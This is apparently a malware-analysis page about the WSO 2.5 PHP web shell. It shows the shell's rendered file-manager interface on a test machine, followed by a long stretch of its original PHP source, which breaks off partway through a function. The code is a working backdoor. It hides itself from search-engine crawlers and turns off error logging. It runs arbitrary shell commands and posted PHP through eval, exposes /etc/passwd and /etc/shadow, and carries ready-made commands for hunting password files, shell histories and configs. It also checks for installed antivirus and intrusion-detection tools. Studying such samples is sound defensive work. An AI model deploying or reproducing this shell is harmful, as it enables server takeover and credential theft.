</form><table class="info" cellpadding="3" cellspacing="0" width="100%"><tbody><tr><td width="1"><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 <a href="http://exploit-db.com/search/?action=search&amp;filter_description=Linux+Kernel+5.15.0" target="_blank">[exploit-db.com]</a></nobr><br>33 ( www-data ) <span>Group:</span> 33 ( www-data )<br>7.2.34-37+ubuntu22.04.1+deb.sury.org+1 <span>Safe mode:</span> <font color="green"><b>OFF</b></font> <a href="#" onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2023-02-12 23:33:17<br>216.08 GB <span>Free:</span> 179.97 GB (83%)<br><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/&quot;)">/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/&quot;)">var/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/&quot;)">www/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/html/&quot;)">html/</a> <font color="#25ff00">drwxrwxrwx</font> <a href="#" onclick="g('FilesMan','/var/www/html','','','')">[ home ]</a><br></td><td width="1" align="right"><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8">UTF-8</option><option value="Windows-1251" selected="">Windows-1251</option><option value="KOI8-R">KOI8-R</option><option value="KOI8-U">KOI8-U</option><option value="cp866">cp866</option></optgroup></select><br><span>Server IP:</span><br>::1<br><span>Client IP:</span><br>::1</nobr></td></tr></tbody></table><table style="border-top:2px solid #333;" cellpadding="3" cellspacing="0" width="100%"><tbody><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></tbody></table><div style="margin:5"><h1>File manager</h1><div class="content"><script>p1_=p2_=p3_="";</script><script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width="100%" class="main" cellspacing="0" cellpadding="2">
<form name="files" method="post"></form><tbody><tr><th width="13px"><input type="checkbox" onclick="sa()" class="chkbx"></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_name_0&quot;)">Name</a></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_size_0&quot;)">Size</a></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_modify_0&quot;)">Modify</a></th><th>Owner/Group</th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_perms_0&quot;)">Permissions</a></th><th>Actions</th></tr><tr><td><input type="checkbox" name="f[]" value=".." class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/html/..');"><b>[ .. ]</b></a></td><td>dir</td><td>2023-02-12 23:33:16</td><td>root/root</td><td><a href="#" onclick="g('FilesTools',null,'..','chmod')"><font color="#25ff00">drwxrwxrwx</font></a></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="beneri.se_malware_analysis" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'view')">beneri.se_malware_analysis</a></td><td>0 B</td><td>2023-02-12 23:33:16</td><td>root/root</td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis','chmod')"><font color="white">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'beneri.se_malware_analysis', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="wso.php5" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'wso.php5', 'view')">wso.php5</a></td><td>64.58 KB</td><td>2023-02-12 23:33:16</td><td>osboxes/osboxes</td><td><a href="#" onclick="g('FilesTools',null,'wso.php5','chmod')"><font color="white">-rw-rw-r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'wso.php5', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'wso.php5', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'wso.php5', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'wso.php5', 'download')">D</a></td></tr><tr><td colspan="7">
	<input type="hidden" name="a" value="FilesMan">
	<input type="hidden" name="c" value="/var/www/html/">
	<input type="hidden" name="charset" value="Windows-1251">
	<select name="p1"><option value="copy">Copy</option><option value="move">Move</option><option value="delete">Delete</option><option value="tar">Compress (tar.gz)</option></select>&nbsp;<input type="submit" value=">>"></td></tr></tbody></table></div>
</div>
<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%" style="border-top:2px solid #333;border-bottom:2px solid #333;">
	<tbody><tr>
		<td><form onsubmit="g(null,this.c.value,&quot;&quot;);return false;"><span>Change dir:</span><br><input class="toolsInp" type="text" name="c" value="/var/www/html/"><input type="submit" value=">>"></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>"></form></td>
	</tr><tr>
		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color="green">(Writeable)</font><br><input class="toolsInp" type="text" name="d"><input type="submit" value=">>"></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color="green">(Writeable)</font><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>"></form></td>
	</tr><tr>
		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type="text" name="c" value=""><input type="submit" value=">>"></form></td>
		<td><form method="post" enctype="multipart/form-data">
		<input type="hidden" name="a" value="FilesMAn">
		<input type="hidden" name="c" value="/var/www/html/">
		<input type="hidden" name="p1" value="uploadFile">
		<input type="hidden" name="charset" value="Windows-1251">
		<span>Upload file:</span> <font color="green">(Writeable)</font><br><input class="toolsInp" type="file" name="f"><input type="submit" value=">>"></form><br></td>
	</tr></tbody></table></div></body></html>

Original PHP code

<?php
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if($argc == 3) {
	$_POST = unserialize(base64_decode($argv[1]));
	$_SERVER = unserialize(base64_decode($argv[2]));
}

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')){
	set_magic_quotes_runtime(0);
}
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
	function WSOstripslashes($array) {
		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
	}
	$_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
	$os = 'win';
else
	$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
	@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
	$home_cwd = str_replace("\\", "/", $home_cwd);
	$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
	$cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
	$aliases = array(
		"List Directory" => "dir",
    	"Find index.php in current dir" => "dir /s /w /b index.php",
    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    	"Show active connections" => "netstat -an",
    	"Show running services" => "net start",
    	"User accounts" => "net user",
    	"Show computers" => "net view",
		"ARP Table" => "arp -a",
		"IP Configuration" => "ipconfig /all"
	);
else
	$aliases = array(
  		"List dir" => "ls -lha",
		"list file attributes on a Linux second extended file system" => "lsattr -va",
  		"show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
		"Find" => "",
  		"find all suid files" => "find / -type f -perm -04000 -ls",
  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
  		"find all sgid files" => "find / -type f -perm -02000 -ls",
  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  		"find config.inc.php files" => "find / -type f -name config.inc.php",
  		"find config* files" => "find / -type f -name \"config*\"",
  		"find config* files in current dir" => "find . -type f -name \"config*\"",
  		"find all writable folders and files" => "find / -perm -2 -ls",
  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
  		"find all service.pwd files" => "find / -type f -name service.pwd",
  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  		"find all .bash_history files" => "find / -type f -name .bash_history",
  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
		"Locate" => "",
  		"locate httpd.conf files" => "locate httpd.conf",
		"locate vhosts.conf files" => "locate vhosts.conf",
		"locate proftpd.conf files" => "locate proftpd.conf",
		"locate psybnc.conf files" => "locate psybnc.conf",
		"locate my.conf files" => "locate my.conf",
		"locate admin.php files" =>"locate admin.php",
		"locate cfg.php files" => "locate cfg.php",
		"locate conf.php files" => "locate conf.php",
		"locate config.dat files" => "locate config.dat",
		"locate config.php files" => "locate config.php",
		"locate config.inc files" => "locate config.inc",
		"locate config.inc.php" => "locate config.inc.php",
		"locate config.default.php files" => "locate config.default.php",
		"locate config* files " => "locate config",
		"locate .conf files"=>"locate '.conf'",
		"locate .pwd files" => "locate '.pwd'",
		"locate .sql files" => "locate '.sql'",
		"locate .htpasswd files" => "locate '.htpasswd'",
		"locate .bash_history files" => "locate '.bash_history'",
		"locate .mysql_history files" => "locate '.mysql_history'",
		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
		"locate backup files" => "locate backup",
		"locate dump files" => "locate dump",
		"locate priv files" => "locate priv"
	);

function wsoHeader() {
	if(empty($_POST['charset']))
		$_POST['charset'] = $GLOBALS['default_charset'];
	global $color;
	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
	$freeSpace = @diskfreespace($GLOBALS['cwd']);
	$totalSpace = @disk_total_space($GLOBALS['cwd']);
	$totalSpace = $totalSpace?$totalSpace:1;
	$release = @php_uname('r');
	$kernel = @php_uname('s');
	$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
	if(strpos('Linux', $kernel) !== false)
		$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
	else
		$explink .= urlencode($kernel . ' ' . substr($release,0,3));
	if(!function_exists('posix_getegid')) {
		$user = @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		$uid = @posix_getpwuid(posix_geteuid());
		$gid = @posix_getgrgid(posix_getegid());
		$user = $uid['name'];
		$uid = $uid['uid'];
		$group = $gid['name'];
		$gid = $gid['gid'];
	}

	$cwd_links = '';
	$path = explode("/", $GLOBALS['cwd']);
	$n=count($path);
	for($i=0; $i<$n-1; $i++) {
		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
		for($j=0; $j<=$i; $j++)
			$cwd_links .= $path[$j].'/';
		$cwd_links .= "\")'>".$path[$i]."/</a>";
	}

	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
	$opt_charsets = '';
	foreach($charsets as $item)
		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
	if(!empty($GLOBALS['auth_pass']))
		$m['Logout'] = 'Logout';
	$m['Self remove'] = 'SelfRemove';
	$menu = '';
	foreach($m as $k => $v)
		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

	$drives = "";
	if($GLOBALS['os'] == 'win') {
		foreach(range('c','z') as $drive)
		if(is_dir($drive.':\\'))
			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
	}
	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}

function wsoFooter() {
	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
	</tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

function wsoEx($in) {
	$out = '';
	if (function_exists('exec')) {
		@exec($in,$out);
		$out = @join("\n",$out);
	} elseif (function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$out = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($in);
		$out = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$out = shell_exec($in);
	} elseif (is_resource($f = @popen($in,"r"))) {
		$out = "";
		while(!@feof($f))
			$out .= fread($f,1024);
		pclose($f);
	}
	return $out;
}

function wsoViewSize($s) {
	if($s >= 1073741824)
		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
	elseif($s >= 1048576)
		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
	elseif($s >= 1024)
		return sprintf('%1.2f', $s / 1024 ) . ' KB';
	else
		return $s . ' B';
}

function wsoPerms($p) {
	if (($p & 0xC000) == 0xC000)$i = 's';
	elseif (($p & 0xA000) == 0xA000)$i = 'l';
	elseif (($p & 0x8000) == 0x8000)$i = '-';
	elseif (($p & 0x6000) == 0x6000)$i = 'b';
	elseif (($p & 0x4000) == 0x4000)$i = 'd';
	elseif (($p & 0x2000) == 0x2000)$i = 'c';
	elseif (($p & 0x1000) == 0x1000)$i = 'p';
	else $i = 'u';
	$i .= (($p & 0x0100) ? 'r' : '-');
	$i .= (($p & 0x0080) ? 'w' : '-');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
	$i .= (($p & 0x0020) ? 'r' : '-');
	$i .= (($p & 0x0010) ? 'w' : '-');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
	$i .= (($p & 0x0004) ? 'r' : '-');
	$i .= (($p & 0x0002) ? 'w' : '-');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
	return $i;
}

function wsoPermsColor($f) {
	if (!@is_readable($f))
		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
	elseif (!@is_writable($f))
		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
	else
		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}

function wsoScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function wsoWhich($p) {
	$path = wsoEx('which ' . $p);
	if(!empty($path))
		return $path;
	return false;
}

function actionSecInfo() {
	wsoHeader();
	echo '<h1>Server security information</h1><div class=content>';
	function wsoSecParam($n, $v) {
		$v = trim($v);
		if($v) {
			echo '<span>' . $n . ': </span>';
			if(strpos($v, "\n") === false)
				echo $v . '<br>';
			else
				echo '<pre class=ml1>' . $v . '</pre>';
		}
	}

	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
	wsoSecParam('Open base dir', @ini_get('open_basedir'));
	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
	$temp=array();
	if(function_exists('mysql_get_client_info'))
		$temp[] = "MySql (".mysql_get_client_info().")";
	if(function_exists('mssql_connect'))
		$temp[] = "MSSQL";
	if(function_exists('pg_connect'))
		$temp[] = "PostgreSQL";
	if(function_exists('oci_connect'))
		$temp[] = "Oracle";
	wsoSecParam('Supported databases', implode(', ', $temp));
	echo '<br>';

	if($GLOBALS['os'] == 'nix') {
            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            wsoSecParam('OS version', @file_get_contents('/proc/version'));
            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    wsoSecParam('Users', $temp);
                }
            }
	} else {
		wsoSecParam('OS Version',wsoEx('ver'));
		wsoSecParam('Account Settings',wsoEx('net accounts'));
		wsoSecParam('User Accounts',wsoEx('net user'));
	}
	echo '</div>';
	wsoFooter();
}

function actionPhp() {
	if(isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
		ob_start();
		eval($_POST['p1']);
		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
		echo strlen($temp), "\n", $temp;
		exit;
	}
    if(empty($_POST['ajax']) && !empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);

	wsoHeader();
	if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
		echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
		ob_start();
		phpinfo();
		$tmp = ob_get_clean();
        $tmp = preg_replace(array (
            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
            '!td, th {(.*)}!msiU',
            '!<img[^>]+>!msiU',
        ), array (
            '',
            '.e, .v, .h, .h th {$1}',
            ''
        ), $tmp);
		echo str_replace('<h1','<h2', $tmp) .'</div><br>';
	}
    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
	echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '</pre></div>';
	wsoFooter();
}

function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    
	if(!empty($_POST['p1'])) {
		switch($_POST['p1']) {
			case 'uploadFile':
